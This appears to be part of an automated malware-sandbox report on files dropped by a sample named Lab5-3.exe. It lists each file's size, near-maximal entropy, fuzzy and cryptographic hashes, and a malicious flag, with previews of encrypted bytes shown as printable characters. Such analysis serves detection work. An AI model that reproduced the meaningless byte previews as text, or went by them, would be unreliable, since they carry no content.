                                                                                                          Preview:...........5G..5(.y+..u@........,.{....W=^v.p....../fe.....~\x.#*........gW;c9.6..7=..D..t.|.W.o..........R...yG.5..d..O^.F..q...f...AX........hay....:....V.k...MgM..P.....).=.. e.4.....H.e.z....~.2....6.c...M.._.#.3}..u>l0...7z....R..3..UbD..w....u1.Eh..Q...Tp.y.U.?...d._...q.....DD5x..p.?........<.P.9u...*...C...:...9!R......4...C......W:.A.>.6vN.{.iPl ..I0.E....b3..x$'.....M.8....k.s...v....i.~..O.Mp.NZ.Hi. {.&!..t8L.}9%%M.;.m<4.... .W%/....q|.2z/D......z.*.},.4.T..a.0...7'd'...m..X..t7DE...d.H..........u".a.ZU.~.F7.....yn..!..[$..v>.tTj..T"...gJ.....Oa.B$....AM.......(.u.).)4.H....g.._...)..U5.....|.K..E2.C9wl.'w....i....;.~..+.LZ.rv...x.......MY.Px.*..-z.'H.oU..qA.I3.'#-I?....`...t.I@....X.",[!P..n|.....|X.3........ihj.`1.....H.Mj.<.....O.....X.B...j#.Ua{...g..plI......._....7/...E..1.M..bJ...$..?.5.WW...M......re.h....`..r..........VJ5=.(...8.l...T....).*K.%@:....B......r.b..(....%....].}v....,.Y.enW.Zt.-....Q...Z.....p.8vA./.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):87392
                                                                                                          Entropy (8bit):7.997856897246342
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:ncmpcQ3WWbduPhPl807BZCZCvCr8jgLvI5iseDeKcrlokJckiL5q0zT6CbxCZ:nbtWydupPlhbCEvCMgLvddZ0lokJB45y
                                                                                                          MD5:0BC3CFF90E6C09CFDDD63183D966A254
                                                                                                          SHA1:4E2D1C6B50D37800233CEB61E788F8F238032E1E
                                                                                                          SHA-256:8B7D220B67027467A59190497A1AA8F731129E1C19B8853D916C49F04CAEC10A
                                                                                                          SHA-512:7C1BC52A5E77DF7B47421C998C54688DDEB1EC4C4C45C895D22A4523AB6DEE4873DE8A3AD376CE202A0880162E0DBF69B7312C1532C85BA86A5907D12189C292
                                                                                                          Malicious:true
                                                                                                          Preview:.a..G...3Aj.....Y.l...-....._.N).a.H...ZsV14o.i\...Ku.[=d.U....PN...z..:....a....V....ChM...L+[..... .p.O.i....qy....+...<..8.L.x..k..C.2_........Ir..a..N.~.5...z].....B..i....8%..cL'.....:o5.|.^u.5.....E.-.X.3.............z~.p.^3f.H.l...k....L.q(..y...&...k...9...?.......iEO.f.3r.h..r...:...>.h!..:3..=..y..[1]?...D.G>....<.N.....eO.|._v'...Z!d.s.......p.......#..c!R.W.D.}tJ..0....RyQ......Y\...p.5U$......Cc. .>..J.V.Gw.0..J....v.N.....%g.)^...uB.H....#.j...... ...P...S)/h&.9.....c..q..l....{......,E.........u.._...C...6y'...t.>...1...m...*.A.~....L..#-.".i..7.E.....qc..!...p..G..~b.@.~$..4_"&d..x.W.#..EZ.*cr.lRqu.J..T.%....B./0....R.8L...[J.d.....b.z..>-.@<.1R.^.&...}.q"[B...lx]...z.....u{2.e.......-.-.[.S.<....;..S....`t]w.AJu.}...%......F.w............D..MO....8.......:.....i......B..,.\...%.z.$.....^..Q.h%.}1.~.7G./S.:?.T...(...,.y...1......?...t....Yz7.r...K9..... ^...s.$.....S^.I..J.`.&...........]....*+.........9.'!AZ.Q.".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):97568
                                                                                                          Entropy (8bit):7.9980830356937735
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:GI2ROhFv8nHHLJZoaBkGjc8qyWK5Ykt+EvAnggtVCZriN0lBzxuc2ioXZ:GfAEnHr6H8qBK5YktGgACZW0ll+ioZ
                                                                                                          MD5:F5F67F59AD8A32D30AB16ECF9A7F2E20
                                                                                                          SHA1:70AC52C76FD069FC1BA3D4347B0EFAB6191C141E
                                                                                                          SHA-256:67EE6C2B40A18C7FBD0415B80204F95A57BC67997A1F36401C747F0F101670B4
                                                                                                          SHA-512:660CBED0F79094565A5350FB597944CF0AB9CD410C38C271E1C4EA6E71D27FD1885E60BA3AE5E2F9F0A3F687E9CA23739DE42DE9E97A1360A7E37E3E1D3C6B87
                                                                                                          Malicious:true
                                                                                                          Preview:.m.:L6....'...@...]....%.|Z.^..k.i......[tA..B.bBuss..1..2.i....n....K."!.0..6d.[........ jK..4.=..`.&...no .E.sUl...?.b.~....t..+..()..I......h..fr-.\......[...;r..|`aqw.,...,....T..3Vj.e.P....$.......r...'.70.v=.W.....?9.nv_!;k./.I.R^'#...wCb?...o...2..q.bds=..D .\C...^.=.,,.f9/..z...>_........{^.d.`C.!....!.#..8R.<..2b.............B..il..T...bx..q.?...u?$.++.......I....ZB..*#...k..`.q.......jzoJ.&...1..5an...i)..vq.{m....../j......[;y...u.$,.e....J........DQ.7...|@l.........j..E.....)~Y..}.xqY......*.b...`......F....<,.l...:..I........X!.>9>p-...-..F.u....f....r....b.4.!..:4,4...`...#[.::..).W......Z6|..3.CUr..a.7.M..'"._'......*..B..M.g......C..X...%^k..E.~.I.G.}..68B.+..6..b..........YFy.3.].z5!6J:.\...6...h.....j..........x...G..`Qr..j*..8.....e...5<$.......2 .-..x.|..y.6.+..n\.i.W......?........J...).r......."z.\5*.u.....B.........L.z......>4..C.B...c.P.>|....yTq..'...C|.}....}...........\......n.|M.......".H.....}.".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89264
                                                                                                          Entropy (8bit):7.998517055013836
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:HhtwBwbZyRBcKCAMUT8o+IuTC6SnKqA4/TdRaFT62BlG8oNZ:bwWK6LUT8pjZP4/THalTB+NZ
                                                                                                          MD5:CB333FFA9E301DD5CF4FF784EFB5F51E
                                                                                                          SHA1:0562DA907ACBAB20431B576DEB0282D065019805
                                                                                                          SHA-256:15E2347363C1AD411479C4F7EFEACF79AE3B523811D2B4552C1CF48E14C5570B
                                                                                                          SHA-512:75E8EC6EC6661702FC079C08379BEB808FC44C3C8792CD103A7B9157058CB49FBD9EFA450DF215562C772D5A57FF23062E6A259ABBCC37A4CA0DF198DDF5A0B7
                                                                                                          Malicious:true
                                                                                                          Preview:....9...>...X...b\P.....l.MX7s.,...d>....&.../.z.........,).`...Ky....B..R )..Q....6..vzTf.e.6.*....'i..M-...[.,+...?..$...E.#....G....\B.............?..JV-...(.;@7........FG.....`V....K.L_t..7.D.....<.p.V..3..........}a.V.V...J...f.(..c.......Q..|.Z:....r..g%.9.^...2.m/.6P..k.JI.E})."..Sc.|.RB..n..A..?.1k.K.C.i..+...;.........-...'....7.....-...6...tP~[<X....H.o.......~*f.....4..c-;6.'.3..yN...W.+....K$Ceul.[eNi.S.........(r8.?..w*.L.o...W..e.....o..E...$.2....!...6..../.3.=.......g.h.S61*.dF&d...h#TC........c@....F..ku]......b.#.......?j......M.|U.W.\.!....?.m.....j..=.m...sG.....c....0..`<...7mh.......$..dQ.Be...$.*...l..r.we..{qX...\..../."A. Lv.Kb.2H]._.!..C.......a.e.|...0r....f.m.....}..\..o.q.I....pf`0..(.9U..sJ.=W......H..U.Sd.../..K..`bkR.S..I.L..l{.z.....w...L..F..n....q.i...}!..L.l?\........z..K...O..Ly.L..`....v...hK\RQ.j<8\.??.k...)L......7A,718*.U.....7v...X+Of..5y&~..:zg.9.....P...SlZ`r....Y9Y7.4.q...F.....N..C.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):83952
                                                                                                          Entropy (8bit):7.997833855058194
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:Zo/a2tDcaAMTRomUDh2lXl+FnLDA18qbsxpBJJPqCm2EHdc7A8JiNMhZ6YiBUx8r:Zi3gaAURjUDhTLWrsxpnVq/2EHdi9J3c
                                                                                                          MD5:A2DD6044F02B17F056AC04D6152B0C0B
                                                                                                          SHA1:6CADC07B8CD9E168AB8AA3F18A00E1918EBB0028
                                                                                                          SHA-256:0A7219727826F7844B607FA20FE309B214117DF47A851B7EA6DA4122CD643657
                                                                                                          SHA-512:A0BEDA37587F42DB9CEEF956CC8DD9A48EB532CA60B8D4018743328A90ED9F22F93598D5AB517C28E029FAB8EF1C6380C6433594B6647CBB9510CA3CE7748E04
                                                                                                          Malicious:true
                                                                                                          Preview:.&.B6...>...Y.a-....g/..q..WTJQz.S},.?.n...........c.V..pq.rB.......a..B.7Ex.f.dBG.../...EQ.R..7..9. ...>.>.`(~....n|.ap_0...'.oq..3?6...9..3.F.v3......=.V?Ic.g..r.]D.....1....^...r.;QE.<.DM..t..w..j..7}Cb...Z.m.....<.9.~c .:9d.U.sZ.O].Q...R.P^....,R?8...rUdk...rc..Qtf.g.S-..[..O....*P..z...O.-8B....z6.Q.)....!....*.<r\..Kv.J.siD."......S....[..T.Fb.YK.=.P0g...7I..i.U...6`...l..)..n.8....8._.~.r.....*~..H9..m.=.}.2.I...W.$......^....kn.x2..........wT.j.......3S.H.........., .)..Nf...k..yD.6..>.p..I.g}\E..j{../iJ..&d..c]v~..M.K..u.W..I.u.e.L:P.Wu......S>V.h...<]4+..-..O.........I...{&,..........`}".'#..('..i..Ny.....g....z.E.G.......,.. ...C.8...y.Hf..yOQ..:..v..Vh.G....2....W..l"LS..........7~>.....5F...T@.M.7.$.{1....L.Z.w.fi...$..4.........w0....`R\..l.oe..+../..r........pA.#J..!.......(f..._.].'O.P...W..S.3O-.t^.5.A..e.....!....l.fZ5_.y'.3.E.6.."....U...#.4.B.HB...........h..9........B.Y.........&Sj..B.../......+.(>....<z!..yJ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89584
                                                                                                          Entropy (8bit):7.99793914786991
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:ffUBQ1is/QRlQkDv8rcjvgeCh9ZaRDgAI0SzPvnqg+4pqSCa1QnM0plRmmU+QJd/:ki1v/QRlQ4UrcTgeMQdnSDns4sRa1Q3W
                                                                                                          MD5:822655AD3C328FA6AA736AFFD7025A89
                                                                                                          SHA1:4BA52085069F7CC6AB17C8148E2662E272E7FF75
                                                                                                          SHA-256:CC933531B85225779DE693478BEE6DBD0B109CF1527288474F5276EC236ACBA6
                                                                                                          SHA-512:4BB2CCBC5E050CEF3251B293336F0852503FBFB0A295D60C3B01D0AA80DA4E446AB323EEE7C33C368341DD5C9DFCAF42633AD0DC17C134E35EA3DED84919DC2F
                                                                                                          Malicious:true
                                                                                                          Preview:|K.p..N.KM.....j.....'kM...A.....~......q.s.t..A.A..J.=..Is.<+........P..!.pF...A../,.y.T.c.i...xG/..bP...%W....1D....I...I....[ j..#.>....TqoE.Z....-).[R.....J.Ct.._....^rN......".N..[......Y.P..P..t%.R..?....e.._.#..Q#B..'..O*..!.e.xt...`).._as.Q@6..R1aG_f...z.z...X ..n..p.,....(.:....H..9...CM>..P......(_B.1.......A`.l.'.$.....=.. +W..R6...Y.H}$.<.In..u].?pS.9.\....VY..UO..)t..L.@.5e.&..P..ut..Rd./.0.....s.l.)..)&<.yM.3K.`.I.-......nt..[m.oF.......M.p.{...|..S7rO.K...J%...........Th<.n..)F.!...A.).%.\=.J,....Z..og........A.....T..%...5...,.cS..V........../cb..OB6M..L..R....q/...:7.6.~.....[...F_6A.....s..=&1..#cy..........+..|.[.qC.|....j....U...{.N..&.H.&.........R.by?<|.k(....h.c..!.Nw.....t.|....s...N.z..f.>4..h..4e.i..}....>`.7...F..D....M..;.UL.8.Y;.Q...YA..<..}{.L.....yJ|..d.s.+.3...kHY...x..U...........e..n.`....p.q./..I.(.{..p..7.....+....}6]...`.W4.*...vE..hM......]..)..R......c..-....y..|...W.....{.Q$.2+...H.{x.&.........&0s>..).<.T .m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):88880
                                                                                                          Entropy (8bit):7.9977606500978835
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:/6ubl/Ejaj3b+nb9MoExIOTlb/lKXW/o6HzQqD0Ymw+a0GqxZ:yubn7inJkqqB/lKXgHzQqRLqxZ
                                                                                                          MD5:B8FE63212764854B3A19392F212D41AE
                                                                                                          SHA1:06438FAD4F60FABC8DA0B19793D371BF9755B394
                                                                                                          SHA-256:BFAB21287D73BD81469792FDD13BCC41A98A0BFEE2815CCD373BA2D8C2DEA8BF
                                                                                                          SHA-512:E2E4320399E07F5B45C6350452A157D1837BAF767C5AB53ECEB6958DB94A198C60C9CFD0FDEB015C1EA9FA4EEBDCF0BA021B6495C02A3E4A91ECE97A1B17113A
                                                                                                          Malicious:true
                                                                                                          Preview:X...Y. ].z............8..av03t..U....T.wJ1.....M:.t..)`0WCv.B-..<.0......z.D.Q...a.~.Xt........u.S.f\.,.zvS...h.Ab\ZP%.!.5..T.g..>.?.n......zP.\...w..S.G7.;m.....z.~!*.A;e..t.>V.q*.K.x...?.8..d.BX.>..|..;c.f'....c.M.Y4.*.KY4.(....'%.......\-..#!.Uy.....H.9w..b9......]....=.N.......rLeo.-.?;.dt!...u....w...m...|.,j8..;:Q...?R.cc.k.-.P.;.<.{..A....xLd....Yh3........l.!..3........;....|>..L..G.ZV.t9.%x.c..$F{`2@....`F..d.P..Qs.n#!.i.;A|.",.W.TK...q2L.=~......|.r..>4(R...r..].....|..c..E._..P...M.b^..)...}..Xc....zmU.w}......O\[[.(G.9.8.....w...z.k/A.5<........9...)_C.5P...Vm2.|.JUp"....y....:&.}...KI..`y..!....;...%<.....u.vb...........p.K.i.O.}>.(.uX........_.....FD..0..=...>.....}......O.sx.2A=...i..@._.....E.v.AxnW="l.9...3.J.....'f...n. ..,.A.$.'..p..t.......l.K.....C..<.y...Xuy..@...).uA.V61.lp......R0.9. .....n6........dd..] .A...2).%.[.=..a.Wb.?~.Y..A?..~.;..p.3...).2......wrS .'..q4.^...=..>..67.5........2.e....q&......X"
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89680
                                                                                                          Entropy (8bit):7.997965615489368
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:+sHEM4FL4HafpI7zSRf4AytllKgBC1aGj3xpII8/u8fPBMPvsoxW17Z1IU7gw8i9:tE9M6xI7WZ4A/ke1BpIv/dPBMPvsox+P
                                                                                                          MD5:6AE94E3470757FD145F9F3BDC469E0C2
                                                                                                          SHA1:538EF33936722918CC041548FD935F8D5B0F4CDE
                                                                                                          SHA-256:21C021F4517B54D79509A5A18063F106B858959B2A2B3826513CD8CB2EA63FFF
                                                                                                          SHA-512:0A2523611EBC5992FD5FC53B1BDD55E98945FE3599FA092643517F4D4922626183E967FEF28C1E7B88B3753428DCA4FBE35F26A5CBF6D0F8403A48D6BC6D1398
                                                                                                          Malicious:true
                                                                                                          Preview:...i.1Y...4.......].F.3f&F*.R....S$.'.E.....F[T/!.,.+73.!.]..B$o..R..'.....hd.*.YT...&1.....\..|..).A..v.3....ukZaY..7G..8:O....4......e6..>!.`.q.....2.l.!.$..e..M.v ^j*....!....\'..Q.|.U.Py.|...x9...W..$%sL\m6..02..G...?..Q.q......*|.T.2..;y.....^....ntG.Ak.oG..Kh.)..Z...v..Z./..Hh.q.F.b.7..l..SHu...*._...4.mJu..W...tk......g....^|.ec!..e}&..f}....G@...J@.U.....t..:......9....L......KX...B.f.6....7'.$VT..._1Lr....|M.$_............91.%(.o.j..d.".."y\.....#o2.R..`Fc. u....AE...`..#T..l..W...%?..K},..6.^Y..|..z../.H.Y.......P.-M>.ug..2+.J..J[.X..R..N.......{...)..$*.#t\....|...F..*......t..-Z...Q.K>fr.N..j..f.&..5.\.n.M.*.bx.w.69....^Y3.(..._ff......#..q._.E..A.!p..i.@z....]..AbPJ...L..h.......G.S...xc#.RCQ.VI..H#..2.....[.6..Yd;....Z.G.nqy..n"]..x.E'L...9dr...-....Bs.x........W.j.l.....Q....=F......e...Elb$..{...+au.j.G(.*,..sN.....32....}M^5.XNo?=D^..I..]1.......2....)>..........z..w.&GY.Ql.B...h...,.....kqe...,.y....}..U..bd..L%Fpt..I....v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):91200
                                                                                                          Entropy (8bit):7.9982948927673885
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:tsuRGbpw92YFVIywptrphMoYg+I2FHoghBc/R3uElUyP7cM1EnAoKxnsolHQ/zPx:3Gi92gwptr7AKsnwVdXoaHObvZ
                                                                                                          MD5:A40E221903A64E01B8AE9F460CC78871
                                                                                                          SHA1:6C4831925446F67B5448C4B41BF3C122F603753C
                                                                                                          SHA-256:D75504F1BAD8544AF1D899316A58166E0622EFCC37BB6E086593B245F981E127
                                                                                                          SHA-512:823FB14C4B6D8144069C0D5B4B4EA62FD4DB58EEB3133E6FDEE3735156046FA85EC02B0E430C5E385F91CEB076C5774FB88C621827C46387EA4ED6A4B559E2E6
                                                                                                          Malicious:true
                                                                                                          Preview:......0..f.C.....ml*...,)T}.CS7b....3..-..@W..XO.go.l.....i._....7!....W{....o.^....&"..`.].U2.L.1=......z...,..xOr.....9.X..J..^..:...\.+..D.5.L.y.P..wDh..[.E.$BCJ....9........3..fFy.\[. .q.....b1.~\...!.T......w..Uc.3@."XR....D...y..).9.)!.\c.~.G ....o.. .@].6f ..$.6.?.=b...(...O.h..t...8.@Sc&....9.h.4.T.F-.....x2s.#z=.X.+c...2Mmh.1.,T)..PvA.....e.K...t.......A..>..S.Bs...4S.w..jtX..-*.,..'C......Yk....U .+I?c..dM..d....@....T.X<..5....g.y..,.....:M#.Mqv.}5,.......wN58..l.<c...+=.#....D..{ejx`mD.6..Z..1...<...G;.G....A.f}L...W..b.&.=.av.A....i....P.L.!.....v.3,W..Y.O.Y...{.9..w+....F...nX..(NHU7?Y..J....].).Sf.I...L....@.D.8.sQt.....W.x...lG.j...&o*#....CR...!...}.I.0|(6..o..<.OP. .....N)`.x....Z5.;..{.....f.S.D|#.7...i.0.o0;.... ....7....p....6.+.,...p\+......4.m...0......**.S9`......[B.........j.-h.S.n..b. `w...l8...H..9..(.....W.=3...uQ.Ie.....Dk..0..|....0.....H...k.d.(.......?6..xn.....,..k.r...s|.*.^.d_u........t.....(....,..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):124096
                                                                                                          Entropy (8bit):7.998138047573293
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Ay/ggypFXVxCq91QA6zKRzt35uhHyLeXTw0UePN27k9062JQ7TIZ:l/gpFXvxQABVB5uhHfXTYek7ka6wQ7sZ
                                                                                                          MD5:667B61B09818D05C5B59FC707EE46604
                                                                                                          SHA1:6753C96E0E0117ED9203987772A806C713E459BB
                                                                                                          SHA-256:3524E8A2D802C7280DB5C6CAB85848C9B0B1CC6F0D4D61742E2D5F25CE2F702C
                                                                                                          SHA-512:B3DE8D77E74084E4F875EF29F596C08F2C70536B0AEFD118E23F66858EBF29B98F3425107B25831751A0E8F0FEF7C7303C23BCDB46F2739AA94064BBF51FF436
                                                                                                          Malicious:true
                                                                                                          Preview:..(%$G.............;H.e..-.=...F].<c..g*M.R....H.R..[g.4h..........!....m....KY*).....X.....Q"OG.....B.....F....M'."..]J.A3R..\.%.5.Y`.S!... ...6..me+.e....N>.....;....k.l.XIVc.....O....G....%.........G.X.l...2......li<........yO..i9.....L....sF~...|q.Z....,...AK..h.0...Ih..6.q*.L..h6.4%.w.u....wKw..7...\>..o.$..2.cU....&V.2~..H....;....9.%.,8..Jw.MuN..$..c+N.+h.}A..K$DS.=.8#.b.Y.aK.....g.f.ln..@3].._g...,w0..&QpQHwnd.m|..T...B...W(.... .&..\8~zD...V'..9.\.).>F.E;...8."gz.....F..x3GL..J>M.-..c4Q.....,=!4....Vq.h.O..&[..F..`$..*.r;3t...k.....5.pp...5=b...S.;..T[mg;..FY)P..)N.. j...+...O..~L...._Ck?)*N...Y..y....o>..z.%...*...^N....`4....#3.\.}Jo.m.0l..j6!.+.....M..$<.{..Ym..i..%X.!.......M.`.........,(...K..A;/.0..>..(P..z...Fa\5......(.2F....F.|.~..8..{.)../.V.D....R.]..n+J.QF...>.7.a..G..{...,LV)...J..s...*.=7.]...:....C..%.r`...A..1.i......i*.l.Rd+xn..q..&...>'.\.A....[.Fj#.l..`>$..#.%^_..h... l.....8.....LR...J[..hJ*_.$yH..6..I.....Mz.HtZ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):90304
                                                                                                          Entropy (8bit):7.997902673381296
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:S3U4BCfQEoo0tCswVghbsxQjtnsIvwSLgQgq7Ny8+XEpDxOZlC/c3IWscM0YZ:SfBgvFVg1s2jF9o9xIDxOZlC/c4ZQYZ
                                                                                                          MD5:4E33D5C4113C57E92E1AB2764919A94B
                                                                                                          SHA1:09400CB2B9987D999BB99AC3F0865CEF56C59036
                                                                                                          SHA-256:27DF39174C70B5C01F140E70C269626E23B9580072DBE792DC801A05FEAC0F7B
                                                                                                          SHA-512:2C9E1655A0331291F4E69DF42BF7CFEF3D56CE1C46B0BEC6E434E3A9F6A773092AC7EEDFBF3B8181C9BB7B1DDCFBBC7DAB1A30B1B4B1A665FC229C7D065FF90E
                                                                                                          Malicious:true
                                                                                                          Preview:.. .W.r.\6.(...Q^Kmb....z....e.T..]..1 ..-x..@.l!......3v"........F...*b..q_.....Q..H....r@`....7.(/...X.T9.j..G..+..gn.U...7.y/.<.#[..x!,...o&.>,.]9f...*...RY..G%.`..<i+.P#.^...W:Q0.O..K....*d..C. :.....&.....D.V.U.Y#..Ad1...c.V.e.B.....HV..7......p8.r.V.p4.h...=8Z...]...za'.nw.pB.^........D.f.._.F-\.4......-..j..?.u3.H..].z:v!ns.......*9TQ..v...@...E...m94C....f.Q`..{.n........`...K.W..T...B."......H..f~a..P..N:.Z,..]7..(.......<...<.....".i..v..u/..]..U,h......c....Ca..xt$...;,.`..6.m..OK.o...W.)Zv.W... .....i.I*M..s...cl.|.a*#.f..v........Y4.6.h...?o.Ab.Q2Z{..K.m...qx6Il....{....v.$$..(.M..HN..C_~.!Ji.M.....K.......&....z.H.M.NXT'z.!2.........'.L.d....w....T.<.,..I.)+c.G..3..6......l;5...}.K...#..}.3..#..C..1Oe.;........=....`....-.o5....,_.,....U2.....67..%.qS.<.<b.d>......"p^.0...6"U#.*..t.H0.*\.5.[..F|....p..tl'.^....*.v...^.W.A."...e|8.....[Q.A|[.o.._h.FP.b..l.r........H=.~..p.JmU...G..P...{]....%...=.t.L..^.4..\.c......{F~uN....%L].0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86704
                                                                                                          Entropy (8bit):7.998308062926003
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:gyKNaCtK3I4yqu4ShIkJxuORzwu38GanYgwUZ0/dJ1AscEx0uc2Z:gDtKDE4SFbzvjKYgwUKQEmR2Z
                                                                                                          MD5:F519C18AB7228EC0A19DCCDAF38E73F7
                                                                                                          SHA1:B8557F468763955FF1414632B971E49E5CC6778B
                                                                                                          SHA-256:06F50E7922CEA0EA6D4C1AD3016D964809545D10A7A24A8A36BCFE134E7DD7E3
                                                                                                          SHA-512:2717DA972DADDF027726E85F312CC93ED3E47824B64D55BC9C373620195E735503A7CF5D1A04463A28CCAE79B916238DAFE66D2F46EE9765ACE9DB45D5C2F84F
                                                                                                          Malicious:true
                                                                                                          Preview:..@].0 .B.....c..G..*...;.T.g./.ej.t....PO2$...(.f.'..X.$.K...j...GF.&......;..#..X8..]%Vg.d..l."N.v..b.y.........Io^.\:.g..R.3.....8C+F.\..l.|...S.m[.#8..2xI....{.........P.<..\.}.<...}^...e...yC..Q...vZ.J..8.:..'.)...`zo..[....w.......Y_....'..:..*R.Q..+.......P.W...?..ezF.9..Bl.].......NH.J..A^p...Kl.....w5.9..S..w,....[ae.$../.^1_g.P.J.oF...{......2'7..`s..k..;...a......l.a/+...$......^W...&S1.k....3q.$...X.P..#.o....8{..C...q".....xX.`........v....E...kp......K.X*>vzs0whoqP.*+.Z.P.%L.a..6\-..\....J...).a.1....Wb]...l.Y.t.-.m.7...#.....-..dg.}....}...JIi~...^.QpMun.....}Cb>{$ua..........."7..!..s.&.^..N.ik..v..x....,.TG.aE{".i..t...u..`oI;..BS7.......%.l....@..>.{..N...F...T)zO..ITV6./.ZTV....E...g....bv......4...'.0\..Hms..].R.nN.....`...$...\...%p$?6......b$..[N..c.F{6.......xo...3...v...!..U...g..*........Je.>...-.g..........v.Ps..*y...^.".M..@.c..y.\...=..r.y....u.Z..D.+....R.{......[5...[po....)......e.x......|^...2.M9.s..fA...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):85408
                                                                                                          Entropy (8bit):7.997851761279489
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:fXZ5KdLoFXAWQ0+ueJ5dWF6eFXiuYXClEdALOLny++bIiUwiAwkqMrHIRZ:fXZ5Kxi+uQ2hyLdALOu+ZiU/AwkFjKZ
                                                                                                          MD5:CEB729F9D740DBEB2F836BD18AF4C881
                                                                                                          SHA1:85EBD290AB7FADB49741ACD25414D87A59F27D4D
                                                                                                          SHA-256:B08EC82B12FEEB19AF82ED109E83212BCF9634FAAEC7F07BAC98B60C2AC9099D
                                                                                                          SHA-512:1500E384BCB3A2F39B08EEAFEEDAF36FCCAE7AE7FF4F528545F08D21F9CE409889EACA98772BB7D91E6D0F469D884D9445FC6907FCB47D5438F6B06EDBFA5668
                                                                                                          Malicious:true
                                                                                                          Preview:.Y....;.....f....I.8."f...u...5.S ]1{..5].;..#...pZ.J..J.8...*o@...-.....&.Y.<..C7.V....D@...7...EYA!.H.+...&..Y..<..-.x...xkU.v.._.....:s.QR.W.K<.<..6......1..P..7m#$.... .%..#...."...Zd...a...%.~_s.{.I...?><-Np.../...r..f......4.`.......X.6.&_ ..2:.t.%..O.yT......bS&....)..........]..k.......$".Ww..`.....$."O..jF...5%I..'{`.._...2hx.n3.................3Y...H.d.UK....V....>.1..5 .....$.._L.Y&!{...#o..b.B.,......4.u.\..^........'.C...#..H.9.r....~....T.. .SCm{6\|_{..>s.G....:.....I,$j..M...b.O..Rn.b<*aA,k..3...-..Q..........S..zd.A8..,............Y...~0...].c.....7...%<)....R...Mn`..r.....Q]k.Bx7_..|....@..W&..U`.]....-#lS.tf.^.Ma...C>.....2}........q..c.C..$=..{..`....yq.:)..J ...B.....S.X...!Z.....{.7...0..(.k.....J..!9.w....:.4|o.(c.(...to`#0....%.......7..a.SeQ`T].R1.O>...`.{.-m ..uW.. .....y...B.:%I.XX..|...af.a....].x..a... ..DW ..6...O.sX..f.a.W..J*...}..6VPe._....6.....ui...A....R)@....9...^...`gk......?JQ.U.\E%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89424
                                                                                                          Entropy (8bit):7.998045096680464
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:EDa+aVeUoCBOgHoAXxReaJK0ESEyQMhFHh9OHTOrwh+9KYwX7ATOh7EnVlRZ:+a+a8Aq5Spjh9aO8h+9KYXTOhAVrZ
                                                                                                          MD5:D904AC77DFFB86B32AF324FE164F3813
                                                                                                          SHA1:128D990DB68199885B2035528A305969D5B028B0
                                                                                                          SHA-256:957EC4133D16EFEBA9A2E686D6AEF9C7E23F19999CFFDB2C22FB42EB0BA10916
                                                                                                          SHA-512:C6F07D4BCC3FEE97492575A6085776D2577002DF12C4742AA1BAA7FF5D289098B227A1FFEA02E0CC18C09B836840998D879D8632770D3044BD2A3664CEC8D7F0
                                                                                                          Malicious:true
